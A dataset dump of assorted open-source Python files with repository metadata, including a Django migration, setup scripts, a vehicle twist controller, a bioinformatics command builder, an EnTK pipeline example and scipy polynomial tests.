hexsha stringlengths 40 40 | size int64 3 1.03M | ext stringclasses 10
values | lang stringclasses 1
value | max_stars_repo_path stringlengths 3 972 | max_stars_repo_name stringlengths 6 130 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 191k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 3 972 | max_issues_repo_name stringlengths 6 130 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 3 972 | max_forks_repo_name stringlengths 6 130 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 3 1.03M | avg_line_length float64 1.13 941k | max_line_length int64 2 941k | alphanum_fraction float64 0 1 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
4b91fe4dd175731041354e85341278b6a5b72cdf | 411 | py | Python | post/migrations/0014_post_video.py | VotarkSocial/votarkAPI | eea10a64ac0b255c97078b90786fccb30d0a451e | [
"MIT"
] | 2 | 2020-06-14T08:25:29.000Z | 2021-09-22T07:48:11.000Z | post/migrations/0014_post_video.py | suulcoder/votarkAPI | eea10a64ac0b255c97078b90786fccb30d0a451e | [
"MIT"
] | 10 | 2020-06-14T08:36:42.000Z | 2022-03-12T00:30:53.000Z | post/migrations/0014_post_video.py | suulcoder/votarkAPI | eea10a64ac0b255c97078b90786fccb30d0a451e | [
"MIT"
] | 1 | 2021-09-22T07:48:17.000Z | 2021-09-22T07:48:17.000Z | # Generated by Django 3.0.4 on 2020-05-21 03:24
from django.db import migrations, models
class Migration(migrations.Migration):
    """Re-add the optional ``video`` upload field to the ``post.Post`` model."""

    # Must apply after the migration that dropped the previous video column.
    dependencies = [
        ('post', '0013_remove_post_video'),
    ]

    operations = [
        migrations.AddField(
            model_name='post',
            name='video',
            # Nullable so existing rows stay valid; uploads land in MEDIA_ROOT/videos/.
            field=models.FileField(null=True, upload_to='videos/', verbose_name=''),
        ),
    ]
| 21.631579 | 84 | 0.596107 |
fa5ce1460b924bf0b0a12b52cfeae48821cd9f44 | 2,433 | py | Python | hecuba_py/tests/withcassandra/hfetch_tests.py | cugni/hecuba | 5f4654d068dff0ef641d37d98bdac46e539fea48 | [
"Apache-2.0"
] | 6 | 2017-11-09T12:59:54.000Z | 2022-02-03T14:04:29.000Z | hecuba_py/tests/withcassandra/hfetch_tests.py | cugni/hecuba | 5f4654d068dff0ef641d37d98bdac46e539fea48 | [
"Apache-2.0"
] | 150 | 2017-10-18T09:24:46.000Z | 2021-11-02T13:28:50.000Z | hecuba_py/tests/withcassandra/hfetch_tests.py | cugni/hecuba | 5f4654d068dff0ef641d37d98bdac46e539fea48 | [
"Apache-2.0"
] | 3 | 2017-11-10T18:56:46.000Z | 2021-11-02T10:35:14.000Z | import unittest
import numpy as np
from hecuba import config, StorageDict
from hfetch import HArrayMetadata
class ConcurrentDict(StorageDict):
    # NOTE: the docstring below is *not* plain documentation -- Hecuba parses
    # the @TypeSpec annotation at class-creation time to derive the Cassandra
    # schema, so its text must remain exactly as written.
    '''
    @TypeSpec <<key:int>,value:int>
    '''
class HfetchTests(unittest.TestCase):
    """Integration tests for the hfetch C++ bindings (require a live Cassandra)."""

    def test_timestamped_writes(self):
        """With timestamped writes enabled, the last of many writes to the
        same key must win after the dict is dropped and re-opened."""
        previous_cfg = config.timestamped_writes
        config.timestamped_writes = "True"
        my_dict = ConcurrentDict("concurrent_dict")
        last_value = 1000
        for value in range(last_value):
            my_dict[0] = value
        # Drop the Python object and force collection so pending writes flush.
        del my_dict
        import gc
        gc.collect()
        my_dict = ConcurrentDict("concurrent_dict")
        retrieved = my_dict[0]
        config.timestamped_writes = previous_cfg  # restore global config
        self.assertEqual(retrieved, last_value - 1)

    def test_harray_metadata_init(self):
        """HArrayMetadata must accept the full 7-argument form and reject
        both the empty and the truncated argument lists."""
        base = np.arange(7 * 8 * 9 * 10).reshape((7, 8, 9, 10))
        args = (list(base.shape), list(base.strides), base.dtype.kind, base.dtype.byteorder,
                base.itemsize, base.flags.num, 0)
        obj = HArrayMetadata(*args)
        with self.assertRaises(TypeError):
            obj = HArrayMetadata()
        with self.assertRaises(TypeError):
            obj = HArrayMetadata(args[1:])

    def test_harray_metadata_refs(self):
        """The extension type must not leak references on construction."""
        base = np.arange(10)
        args = (list(base.shape), list(base.strides), base.dtype.kind, base.dtype.byteorder,
                base.itemsize, base.flags.num, 0)
        obj = HArrayMetadata(*args)
        import gc
        gc.collect()
        import sys
        # The test has the first ref, the method getrefcount has the second reference
        self.assertEqual(sys.getrefcount(obj), 2)

    def test_register(self):
        """Registering HArrayMetadata as the codec for the np_meta UDT must
        not raise; keyspace is created and dropped around the call."""
        from hfetch import HArrayMetadata
        # connecting c++ bindings
        from hecuba import config
        config.session.execute("DROP KEYSPACE IF EXISTS test_np_meta;")
        config.session.execute("CREATE KEYSPACE IF NOT EXISTS test_np_meta "
                               "WITH replication = {'class': 'SimpleStrategy', 'replication_factor': 1};")
        config.session.execute("""CREATE TYPE IF NOT EXISTS test_np_meta.np_meta (flags int, elem_size int,
                   partition_type tinyint, dims list<int>, strides list<int>, typekind text, byteorder text)""")
        config.cluster.register_user_type('test_np_meta', 'np_meta', HArrayMetadata)
        config.session.execute("DROP KEYSPACE IF EXISTS test_np_meta;")
| 31.597403 | 108 | 0.646116 |
3613265be69e051f091160242a66e532da487674 | 417 | py | Python | setup.py | edersohe/bottle-resource | dd409ced21cf0c697af7b24647f647bd02018b2c | [
"MIT"
] | null | null | null | setup.py | edersohe/bottle-resource | dd409ced21cf0c697af7b24647f647bd02018b2c | [
"MIT"
] | null | null | null | setup.py | edersohe/bottle-resource | dd409ced21cf0c697af7b24647f647bd02018b2c | [
"MIT"
] | null | null | null | from setuptools import setup
# Read the dependency pins once at import time.  Using a ``with`` block
# (rather than a bare ``open``) guarantees the file handle is closed
# promptly instead of relying on garbage collection.
with open('requirements.txt') as req_file:
    requirements = req_file.readlines()

# Distribution metadata for the bottle-resource helper module.
setup(
    name='bottle-resource',
    version='0.0.1b',
    author='Eder Sosa',
    author_email='eder.sohe@gmail.com',
    description='Bottle resource help to build resource APIs',
    py_modules=['bottle_resource'],
    install_requires=requirements,
    license='MIT',
    url='https://github.com/edersohe/bottle-resource.git'
)
| 26.0625 | 62 | 0.705036 |
cff199c74ce3e1fb79b4241bb40259e55a05df48 | 619 | py | Python | neutron/plugins/virtualbox/__init__.py | alexandrucoman/vbox-neutron-agent | 4c6955276d9a3d534505fe2b08948a76acda3d6f | [
"Apache-2.0"
] | null | null | null | neutron/plugins/virtualbox/__init__.py | alexandrucoman/vbox-neutron-agent | 4c6955276d9a3d534505fe2b08948a76acda3d6f | [
"Apache-2.0"
] | null | null | null | neutron/plugins/virtualbox/__init__.py | alexandrucoman/vbox-neutron-agent | 4c6955276d9a3d534505fe2b08948a76acda3d6f | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2015 Cloudbase Solutions Srl
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
| 44.214286 | 78 | 0.728595 |
905b92a91ff9aaae054d1f6e3c7b18fa7f9c731d | 908 | py | Python | setup.py | lucassel/bitchbetterhavemymoney | b3036b65b6e5b1e2f1fc903bde1691d7f4c8c725 | [
"MIT"
] | null | null | null | setup.py | lucassel/bitchbetterhavemymoney | b3036b65b6e5b1e2f1fc903bde1691d7f4c8c725 | [
"MIT"
] | null | null | null | setup.py | lucassel/bitchbetterhavemymoney | b3036b65b6e5b1e2f1fc903bde1691d7f4c8c725 | [
"MIT"
] | null | null | null | from setuptools import setup
def readme():
    """Return the full text of README.md (UTF-8) for the long description."""
    with open('README.md', encoding='utf-8') as readme_file:
        return readme_file.read()
# Distribution metadata, assembled first so the setup() invocation stays tidy.
_metadata = dict(
    name="bitchbetterhavemymoney",
    version="0.0.0.5",
    description="A Python CLI tool to check your Monizze maaltijdcheques.",
    long_description=readme(),
    long_description_content_type="text/plain",
    url="https://github.com/lucassel/bitchbetterhavemymoney",
    author="Lucas Selfslagh",
    license="MIT",
    classifiers=[
        "License :: OSI Approved :: MIT License",
        "Programming Language :: Python :: 3",
        "Programming Language :: Python :: 3.7",
    ],
    packages=["bitchbetterhavemymoney"],
    include_package_data=True,
    install_requires=[
        'selenium',
    ],
    entry_points={
        "console_scripts": [
            "bitchbetterhavemymoney=bitchbetterhavemymoney.cli:main",
        ]
    },
)

setup(**_metadata)
da987703430260ca008bcc2ff5849f246490dd58 | 419 | py | Python | acce/setup.py | ciphertechsolutions/stoq-plugins-public | 95cfc1c5ef01da95e96ea9f7cbfecebd4451c88c | [
"Apache-2.0"
] | null | null | null | acce/setup.py | ciphertechsolutions/stoq-plugins-public | 95cfc1c5ef01da95e96ea9f7cbfecebd4451c88c | [
"Apache-2.0"
] | null | null | null | acce/setup.py | ciphertechsolutions/stoq-plugins-public | 95cfc1c5ef01da95e96ea9f7cbfecebd4451c88c | [
"Apache-2.0"
] | null | null | null | from setuptools import setup, find_packages
# Distribution metadata for the ACCE stoQ worker plugin.
setup(
    name="acce",
    version="3.0.0",
    author="Cipher Tech Solutions (acce.support@ciphertechsolutions.com)",
    url="https://github.com/PUNCH-Cyber/stoq-plugins-public",
    license="Apache License 2.0",
    description=(
        "Scan payloads using ACCE "
        "(Automated Component and Configuration Extraction)"
    ),
    packages=find_packages(),
    include_package_data=True,
)
| 32.230769 | 94 | 0.73031 |
ffbc48cc7db0d1435e47fe296212a9959d31d5fd | 403 | py | Python | projects/migrations/0030_auto_20200722_2228.py | peppasd/LIT | 80e256e7678be3cf3ad72d152005cdb7778545d5 | [
"MIT"
] | 2 | 2020-06-05T14:49:11.000Z | 2021-07-19T17:50:05.000Z | projects/migrations/0030_auto_20200722_2228.py | peppasd/LIT | 80e256e7678be3cf3ad72d152005cdb7778545d5 | [
"MIT"
] | 50 | 2020-05-29T11:15:33.000Z | 2020-07-29T15:30:53.000Z | projects/migrations/0030_auto_20200722_2228.py | peppasd/LIT | 80e256e7678be3cf3ad72d152005cdb7778545d5 | [
"MIT"
] | null | null | null | # Generated by Django 3.0.8 on 2020-07-22 20:28
from django.db import migrations, models
class Migration(migrations.Migration):
    """Make ``projects.Photo.photo`` an optional upload stored under images/."""

    dependencies = [
        ('projects', '0029_auto_20200722_1601'),
    ]

    operations = [
        migrations.AlterField(
            model_name='photo',
            name='photo',
            # blank=True lets forms leave the field empty; files go to MEDIA_ROOT/images/.
            field=models.FileField(blank=True, upload_to='images/'),
        ),
    ]
| 21.210526 | 68 | 0.600496 |
efb31b3b8c6763a5c89744a61bc549f6436dfb7d | 4,542 | py | Python | twist_controller/twist_controller.py | ashutoshpatel2210/CarNd-Capstone-ashutosh | 1aecc77bf5ed39eba121a8bd9dc0580f122753c2 | [
"MIT"
] | null | null | null | twist_controller/twist_controller.py | ashutoshpatel2210/CarNd-Capstone-ashutosh | 1aecc77bf5ed39eba121a8bd9dc0580f122753c2 | [
"MIT"
] | 10 | 2019-12-16T22:19:32.000Z | 2022-02-10T00:47:29.000Z | twist_controller/twist_controller.py | ashutoshpatel2210/CarNd-Capstone-ashutosh | 1aecc77bf5ed39eba121a8bd9dc0580f122753c2 | [
"MIT"
] | null | null | null |
from pid import PID
from lowpass import LowPassFilter
from yaw_controller import YawController
import rospy
GAS_DENSITY = 2.858  # presumably kg per gallon of gasoline (unused in this file) -- confirm
ONE_MPH = 0.44704  # metres/second in one mile/hour (unused in this file)
LOGGING_THROTTLE_FACTOR = 1  # minimum seconds between diagnostic log lines
class Controller(object):
    """Drive-by-wire controller.

    Converts a target linear/angular velocity into (throttle, brake,
    steering) commands: steering via a YawController, throttle via a
    bounded PID on the velocity error, and brake torque derived from the
    required deceleration.
    """

    def __init__(self, vehicle_mass,fuel_capacity, brake_deadband, decel_limit,
                 accel_limit,
                 wheel_radius,
                 wheel_base,
                 steer_ratio,
                 max_lat_accel,
                 max_steer_angle):
        # TODO: Implement
        # 0.1 here is the minimum speed passed to the yaw controller.
        self.yaw_controller = YawController(wheel_base, steer_ratio, 0.1, max_lat_accel, max_steer_angle)

        # PID gains for throttle; output clamped to [0.0, 0.4] so the
        # controller never commands full throttle.
        kp = 0.3
        ki = 0.1
        kd = 0
        mn = 0.0
        mx = 0.4
        self.throttle_controller = PID(kp, ki, kd, mn, mx)

        # Low-pass filter to smooth the noisy measured velocity
        # (tau = 0.5 time constant, ts = 0.02 sample time).
        tau = 0.5
        ts = 0.02
        self.vel_lpf = LowPassFilter(tau, ts)
        #self.lowpass_steer = LowPassFilter(tau, ts)

        self.vehicle_mass = vehicle_mass
        self.fuel_capacity = fuel_capacity
        self.brake_deadband = brake_deadband
        self.decel_limit = decel_limit
        self.accel_limit = accel_limit
        self.wheel_radius = wheel_radius

        # Timestamps for PID sample-time computation and log rate limiting.
        self.last_time = rospy.get_time()
        self.log_time = rospy.get_time()

    def control(self, current_vel, dbw_enabled, linear_vel, angular_vel):
        # TODO: Change the arg, kwarg list to suit your needs
        # Return throttle, brake, steer

        # While a human is driving, reset the PID integrator so accumulated
        # error does not cause a jump when drive-by-wire re-engages.
        if not dbw_enabled:
            self.throttle_controller.reset()
            return 0.0, 0.0, 0.0

        current_vel = self.vel_lpf.filt(current_vel)

        current_time = rospy.get_time()
        sample_time = current_time - self.last_time
        self.last_time = current_time

        #steer = self.lowpass_steer.filt(steering)

        vel_error = linear_vel - current_vel
        self.last_vel = current_vel

        throttle = self.throttle_controller.step(vel_error, sample_time)
        brake = 0.0

        if linear_vel == 0.0 and current_vel < 0.1:
            # Target is a full stop and we are nearly stopped: hold the car
            # in place with a fixed brake value.
            throttle = 0.0
            brake = 400.0
        elif throttle < 0.1 and vel_error < 0.0:
            # Need to slow down: convert desired deceleration into brake
            # effort = |decel| * mass * wheel radius, capped at 400
            # (presumably torque in N*m -- confirm against the DBW node).
            throttle = 0.0
            decel = max(vel_error, self.decel_limit)
            brake = min(400.0, (abs(decel) * self.vehicle_mass * self.wheel_radius))

        steering = self.yaw_controller.get_steering(linear_vel, angular_vel, current_vel)

        # Rate-limited diagnostics (at most once per LOGGING_THROTTLE_FACTOR s).
        if (current_time - self.log_time) > LOGGING_THROTTLE_FACTOR:
            self.log_time = current_time
            rospy.logwarn("POSE: current_vel={:.2f}, linear_vel={:.2f}, vel_error={:.2f}".format(current_vel,
                                                                                                linear_vel,
                                                                                                vel_error))
            rospy.logwarn("POSE: throttle={:.2f}, brake={:.2f}, steering={:.2f}".format(throttle, brake, steering))

        return throttle, brake, steering

        # Dead code: an earlier control strategy kept for reference inside a
        # string literal (never executed).
        '''
        if current_vel < 0.1:
            brake = 700
            throttle = 0
            sterring = 0
        else:
            vel_error = self.vel_lpf.filt(linear_vel - current_vel)
            throttle = self.throttle_controller.step(vel_error, sample_time)
            if throttle > 0:
                brake = 0
            else:
                decel = -throttle
                throttle = 0
                if decel < self.brake_deadband:
                    decel = 0
                brake = min(700.0, (abs(decel) * self.vehicle_mass * self.wheel_radius))
        steering = self.yaw_controller.get_steering(linear_vel, angular_vel, current_vel)

        #if (current_time - self.log_time) > LOGGING_THROTTLE_FACTOR:
        #    self.log_time = current_time
        rospy.logwarn("POSE: current_vel={:.2f}, linear_vel={:.2f}, vel_error={:.2f}".format(current_vel,
                                                                                            linear_vel,
                                                                                            vel_error))
        rospy.logwarn("POSE: throttle={:.2f}, brake={:.2f}, steering={:.2f}".format(throttle, brake, steering))

        return throttle, brake, steering
        '''
| 38.491525 | 115 | 0.505504 |
c3e173cbb7dd619a0c6f79f613e46b1d11436545 | 267 | py | Python | scripts/Hisat.py | KoesGroup/Snakemake_hisat-DESeq | b41114f57956c5ccb2bdbe3f98a0be8865788b70 | [
"MIT"
] | 3 | 2019-04-19T03:13:49.000Z | 2020-09-16T07:19:36.000Z | scripts/Hisat.py | KoesGroup/Snakemake_hisat-DESeq | b41114f57956c5ccb2bdbe3f98a0be8865788b70 | [
"MIT"
] | 20 | 2018-10-04T09:47:55.000Z | 2019-11-26T10:21:28.000Z | scripts/Hisat.py | KoesGroup/Snakemake_hisat-DESeq | b41114f57956c5ccb2bdbe3f98a0be8865788b70 | [
"MIT"
] | 4 | 2019-11-14T17:22:41.000Z | 2021-08-24T13:18:20.000Z | import sys
import os

# Command-line layout (assumed from the indexing below -- confirm):
#   script.py <hisat2 index> <mate-1 files...> <mate-2 files...> <outputs...>
# where the three trailing groups are equally sized.
args = sys.argv
# NOTE(review): this spawns a subshell and has no effect on this process's
# working directory; kept for fidelity with the original script.
os.system("cd ../")
# Integer division is required: on Python 3, "/" yields a float and
# range(2, 2 + num) below would raise TypeError.
num = len(args[2:]) // 3
for i in range(2, 2 + num):
    command = "hisat2 -x {} -1 {} -2 {} | samtools view -Sb -f 2 {}".format(args[1], args[i], args[i + num], args[i + 2 * num])
    print(command)
    #os.system(command)
d6fe15e05472cc59c90ce9e660d5136292b4fd29 | 2,487 | py | Python | examples/misc/suspend_pipelines.py | wilkinson/radical.entk | c73e031966f029bc401cfc23b15e1431112b6572 | [
"MIT"
] | null | null | null | examples/misc/suspend_pipelines.py | wilkinson/radical.entk | c73e031966f029bc401cfc23b15e1431112b6572 | [
"MIT"
] | null | null | null | examples/misc/suspend_pipelines.py | wilkinson/radical.entk | c73e031966f029bc401cfc23b15e1431112b6572 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
import os
import sys
import time
import radical.entk as re
# ------------------------------------------------------------------------------
#
# RabbitMQ connection parameters, overridable via the environment.
hostname = os.environ.get('RMQ_HOSTNAME', 'localhost')
port = int(os.environ.get('RMQ_PORT', 5672))

pipes = list()  # shared pipeline list; the master pipeline suspends/resumes the rest
cnt = 0  # NOTE(review): appears unused in this script
# ------------------------------------------------------------------------------
#
def generate_pipeline(master=False):
    """Build a two-stage pipeline of sleep tasks.

    The master pipeline suspends every other pipeline in the global
    ``pipes`` list after its first stage and resumes them after its
    second; non-master pipelines get no-op hooks instead.
    """
    global pipes

    if master:
        def suspend_others():
            for other in pipes[1:]:
                other.suspend()

        def resume_others():
            for other in pipes[1:]:
                other.resume()
    else:
        def suspend_others():
            pass

        def resume_others():
            pass

    # Stage 1: the master finishes quickly; the others sleep long enough
    # to still be running when the master's post_exec suspends them.
    first_task = re.Task()
    first_task.executable = '/bin/sleep'
    first_task.arguments = [' 1'] if master else ['10']

    first_stage = re.Stage()
    first_stage.add_tasks(first_task)
    first_stage.post_exec = suspend_others

    # Stage 2: a short sleep, after which the master resumes the others.
    second_task = re.Task()
    second_task.executable = '/bin/sleep'
    second_task.arguments = ['1']

    second_stage = re.Stage()
    second_stage.add_tasks(second_task)
    second_stage.post_exec = resume_others

    pipeline = re.Pipeline()
    pipeline.add_stages(first_stage)
    pipeline.add_stages(second_stage)
    return pipeline
# ------------------------------------------------------------------------------
#
if __name__ == '__main__':

    # Create a dictionary describe four mandatory keys:
    # resource, walltime, cores and project
    # resource is 'local.localhost' to execute locally
    res_dict = {
        'resource': 'local.localhost',
        'walltime': 15,
        'cpus' : 2,
    }

    # Create Application Manager
    appman = re.AppManager(hostname=hostname, port=port)
    appman.resource_desc = res_dict

    # Pipeline 0 is the master; the other three are suspended/resumed by it.
    pipes.append(generate_pipeline(True))
    pipes.append(generate_pipeline(False))
    pipes.append(generate_pipeline(False))
    pipes.append(generate_pipeline(False))

    # Assign the workflow as a set of Pipelines to the Application Manager
    appman.workflow = pipes

    done = False

    # Background monitor: print each pipeline's state once a second until
    # the run finishes (note: Python 2 print-statement syntax).
    def tmp():
        while not done:
            for p in pipes:
                print p.state,
            print
            time.sleep(1)

    import threading as mt
    t = mt.Thread(target=tmp)
    t.start()

    # Run the Application Manager
    appman.run()
    appman.terminate()

    # Stop the monitor thread and wait for it to exit.
    done = True
    t.join()
| 22.609091 | 80 | 0.500201 |
6c3545c82c8fe07d34a503ae14ad8c6861b5cfa7 | 8,537 | py | Python | tests/build/scipy/scipy/special/tests/test_orthogonal_eval.py | crougeux/-a-i_v1.6.3_modif | b499a812e79f335d082d3f9b1070e0465ad67bab | [
"BSD-3-Clause"
] | 26 | 2018-02-14T23:52:58.000Z | 2021-08-16T13:50:03.000Z | tests/build/scipy/scipy/special/tests/test_orthogonal_eval.py | crougeux/-a-i_v1.6.3_modif | b499a812e79f335d082d3f9b1070e0465ad67bab | [
"BSD-3-Clause"
] | null | null | null | tests/build/scipy/scipy/special/tests/test_orthogonal_eval.py | crougeux/-a-i_v1.6.3_modif | b499a812e79f335d082d3f9b1070e0465ad67bab | [
"BSD-3-Clause"
] | 10 | 2018-08-13T19:38:39.000Z | 2020-04-19T03:02:00.000Z | from __future__ import division, print_function, absolute_import
from distutils.version import LooseVersion
import sys
import numpy as np
from numpy.testing import assert_, assert_allclose, dec
import scipy.special.orthogonal as orth
from scipy.special._testutils import FuncData
# Early Numpy versions have bugs in ufunc keyword argument parsing
# Decorator: skip a test when running NumPy < 1.6 on Python 3, where the
# sig= ufunc keyword used by TestRecurrence is not parsed correctly.
numpy_version_requirement = dec.skipif(
    LooseVersion(np.version.version) < LooseVersion('1.6')
    and sys.version_info[0] >= 3,
    "Bug in Numpy < 1.6 on Python 3")
def test_eval_chebyt():
    """Check eval_chebyt against the cos(n*arccos(x)) closed form."""
    degrees = np.arange(0, 10000, 7)
    point = 2*np.random.rand() - 1
    expected = np.cos(degrees*np.arccos(point))
    computed = orth.eval_chebyt(degrees, point)
    assert_(np.allclose(expected, computed, rtol=1e-15))
def test_warnings():
    """Regression test for ticket 1334: evaluations must raise no FP warnings."""
    saved_err_state = np.seterr(all='raise')
    try:
        # With every FP warning promoted to an exception, each call below
        # must complete silently.
        orth.eval_legendre(1, 0)
        orth.eval_laguerre(1, 1)
        orth.eval_gegenbauer(1, 1, 0)
    finally:
        np.seterr(**saved_err_state)
class TestPolys(object):
    """
    Check that the eval_* functions agree with the constructed polynomials
    """

    def check_poly(self, func, cls, param_ranges=[], x_range=[], nn=10,
                   nparam=10, nx=10, rtol=1e-8):
        # Compare func(n, *params, x) against np.poly1d(cls(n, *params))(x)
        # over nn degrees, nparam random parameter draws per degree and nx
        # sample points.  (The mutable default lists are never mutated, so
        # sharing them across calls is harmless.)
        np.random.seed(1234)

        dataset = []
        for n in np.arange(nn):
            params = [a + (b-a)*np.random.rand(nparam) for a,b in param_ranges]
            params = np.asarray(params).T
            if not param_ranges:
                params = [0]
            for p in params:
                if param_ranges:
                    p = (n,) + tuple(p)
                else:
                    p = (n,)
                x = x_range[0] + (x_range[1] - x_range[0])*np.random.rand(nx)
                x[0] = x_range[0]  # always include domain start point
                x[1] = x_range[1]  # always include domain end point
                poly = np.poly1d(cls(*p))
                z = np.c_[np.tile(p, (nx,1)), x, poly(x)]
                dataset.append(z)

        dataset = np.concatenate(dataset, axis=0)

        def polyfunc(*p):
            # FuncData supplies every column as float; the degree must be int.
            p = (p[0].astype(int),) + p[1:]
            return func(*p)

        # Raise on any FP warning so silent accuracy problems surface.
        olderr = np.seterr(all='raise')
        try:
            ds = FuncData(polyfunc, dataset, list(range(len(param_ranges)+2)), -1,
                          rtol=rtol)
            ds.check()
        finally:
            np.seterr(**olderr)

    def test_jacobi(self):
        self.check_poly(orth.eval_jacobi, orth.jacobi,
                        param_ranges=[(-0.99, 10), (-0.99, 10)], x_range=[-1, 1],
                        rtol=1e-5)

    def test_sh_jacobi(self):
        self.check_poly(orth.eval_sh_jacobi, orth.sh_jacobi,
                        param_ranges=[(1, 10), (0, 1)], x_range=[0, 1],
                        rtol=1e-5)

    def test_gegenbauer(self):
        self.check_poly(orth.eval_gegenbauer, orth.gegenbauer,
                        param_ranges=[(-0.499, 10)], x_range=[-1, 1],
                        rtol=1e-7)

    def test_chebyt(self):
        self.check_poly(orth.eval_chebyt, orth.chebyt,
                        param_ranges=[], x_range=[-1, 1])

    def test_chebyu(self):
        self.check_poly(orth.eval_chebyu, orth.chebyu,
                        param_ranges=[], x_range=[-1, 1])

    def test_chebys(self):
        self.check_poly(orth.eval_chebys, orth.chebys,
                        param_ranges=[], x_range=[-2, 2])

    def test_chebyc(self):
        self.check_poly(orth.eval_chebyc, orth.chebyc,
                        param_ranges=[], x_range=[-2, 2])

    def test_sh_chebyt(self):
        # FP warnings are expected here, so they are ignored (not raised).
        olderr = np.seterr(all='ignore')
        try:
            self.check_poly(orth.eval_sh_chebyt, orth.sh_chebyt,
                            param_ranges=[], x_range=[0, 1])
        finally:
            np.seterr(**olderr)

    def test_sh_chebyu(self):
        self.check_poly(orth.eval_sh_chebyu, orth.sh_chebyu,
                        param_ranges=[], x_range=[0, 1])

    def test_legendre(self):
        self.check_poly(orth.eval_legendre, orth.legendre,
                        param_ranges=[], x_range=[-1, 1])

    def test_sh_legendre(self):
        # FP warnings are expected here, so they are ignored (not raised).
        olderr = np.seterr(all='ignore')
        try:
            self.check_poly(orth.eval_sh_legendre, orth.sh_legendre,
                            param_ranges=[], x_range=[0, 1])
        finally:
            np.seterr(**olderr)

    def test_genlaguerre(self):
        self.check_poly(orth.eval_genlaguerre, orth.genlaguerre,
                        param_ranges=[(-0.99, 10)], x_range=[0, 100])

    def test_laguerre(self):
        self.check_poly(orth.eval_laguerre, orth.laguerre,
                        param_ranges=[], x_range=[0, 100])

    def test_hermite(self):
        self.check_poly(orth.eval_hermite, orth.hermite,
                        param_ranges=[], x_range=[-100, 100])

    def test_hermitenorm(self):
        self.check_poly(orth.eval_hermitenorm, orth.hermitenorm,
                        param_ranges=[], x_range=[-100, 100])
class TestRecurrence(object):
    """
    Check that the eval_* functions sig='ld->d' and 'dd->d' agree.
    """

    def check_poly(self, func, param_ranges=[], x_range=[], nn=10,
                   nparam=10, nx=10, rtol=1e-8):
        # Build a dataset with the all-double ('dd->d') signature and then
        # re-evaluate through FuncData with the integer-degree ('ld->d')
        # signature; the two code paths must agree to within rtol.
        np.random.seed(1234)

        dataset = []
        for n in np.arange(nn):
            params = [a + (b-a)*np.random.rand(nparam) for a,b in param_ranges]
            params = np.asarray(params).T
            if not param_ranges:
                params = [0]
            for p in params:
                if param_ranges:
                    p = (n,) + tuple(p)
                else:
                    p = (n,)
                x = x_range[0] + (x_range[1] - x_range[0])*np.random.rand(nx)
                x[0] = x_range[0]  # always include domain start point
                x[1] = x_range[1]  # always include domain end point
                kw = dict(sig=(len(p)+1)*'d'+'->d')
                z = np.c_[np.tile(p, (nx,1)), x, func(*(p + (x,)), **kw)]
                dataset.append(z)

        dataset = np.concatenate(dataset, axis=0)

        def polyfunc(*p):
            # Degree column arrives as float; force the 'l' (int) signature.
            p = (p[0].astype(int),) + p[1:]
            kw = dict(sig='l'+(len(p)-1)*'d'+'->d')
            return func(*p, **kw)

        olderr = np.seterr(all='raise')
        try:
            ds = FuncData(polyfunc, dataset, list(range(len(param_ranges)+2)), -1,
                          rtol=rtol)
            ds.check()
        finally:
            np.seterr(**olderr)

    @numpy_version_requirement
    def test_jacobi(self):
        self.check_poly(orth.eval_jacobi,
                        param_ranges=[(-0.99, 10), (-0.99, 10)], x_range=[-1, 1])

    @numpy_version_requirement
    def test_sh_jacobi(self):
        self.check_poly(orth.eval_sh_jacobi,
                        param_ranges=[(1, 10), (0, 1)], x_range=[0, 1])

    @numpy_version_requirement
    def test_gegenbauer(self):
        self.check_poly(orth.eval_gegenbauer,
                        param_ranges=[(-0.499, 10)], x_range=[-1, 1])

    @numpy_version_requirement
    def test_chebyt(self):
        self.check_poly(orth.eval_chebyt,
                        param_ranges=[], x_range=[-1, 1])

    @numpy_version_requirement
    def test_chebyu(self):
        self.check_poly(orth.eval_chebyu,
                        param_ranges=[], x_range=[-1, 1])

    @numpy_version_requirement
    def test_chebys(self):
        self.check_poly(orth.eval_chebys,
                        param_ranges=[], x_range=[-2, 2])

    @numpy_version_requirement
    def test_chebyc(self):
        self.check_poly(orth.eval_chebyc,
                        param_ranges=[], x_range=[-2, 2])

    @numpy_version_requirement
    def test_sh_chebyt(self):
        self.check_poly(orth.eval_sh_chebyt,
                        param_ranges=[], x_range=[0, 1])

    @numpy_version_requirement
    def test_sh_chebyu(self):
        self.check_poly(orth.eval_sh_chebyu,
                        param_ranges=[], x_range=[0, 1])

    @numpy_version_requirement
    def test_legendre(self):
        self.check_poly(orth.eval_legendre,
                        param_ranges=[], x_range=[-1, 1])

    @numpy_version_requirement
    def test_sh_legendre(self):
        self.check_poly(orth.eval_sh_legendre,
                        param_ranges=[], x_range=[0, 1])

    @numpy_version_requirement
    def test_genlaguerre(self):
        self.check_poly(orth.eval_genlaguerre,
                        param_ranges=[(-0.99, 10)], x_range=[0, 100])

    @numpy_version_requirement
    def test_laguerre(self):
        self.check_poly(orth.eval_laguerre,
                        param_ranges=[], x_range=[0, 100])
| 32.96139 | 82 | 0.554879 |
